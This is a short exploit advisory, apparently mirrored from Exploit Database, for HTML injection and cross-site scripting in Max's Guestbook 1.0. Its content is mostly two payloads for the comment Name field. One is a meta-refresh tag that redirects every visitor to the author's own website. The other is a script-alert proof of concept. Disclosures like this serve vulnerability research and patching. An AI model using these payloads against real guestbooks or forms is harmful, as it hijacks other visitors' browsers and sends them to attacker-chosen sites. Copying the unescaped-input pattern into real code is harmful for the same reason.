Max’s Guestbook – HTML Injection / Cross-Site Scripting

• Exploit Database
• 102 阅读

• 作者： MiND C0re
  日期： 2010-08-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14834/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  ================================================================ # In the name of ALLAH ! # ====================================================================== =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ################################# #_____ __ __ /___/# # / ___/\ \/ / / / # #(__) \ \/ / / /# # /____/ \__//_/ # ################################# ######################################################################## # Name: Max&apos;s Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities # Vendor: http://www.phpf1.com/download.html?item=18 # Date: 2010-08-15 # Author: MiND # Greets: Sa-ViRuS.CoM,RENO,Dr.php,!BaD BoY!,Gov.HaCker,AntiSeCuRe,Dr.$audi... # Contact: SlaSHMiND@HoTMaiL.CoM # Home: WwW.Sa-ViRuS.CoM ########################################################################     [~] HTML Injection Vuln . : Add A New Comment And The exploit is in Name :) <meta http-equiv="refresh" content="0;url=http://sa-virus.com/" /> ( thats redirecting to sa-virus.com )     [~] Xss Vuln. : Add A New Comment And The exploit is in Name :) <script>alert(&apos;MiND - Sa-ViRuS.CoM&apos;)</script>       Peace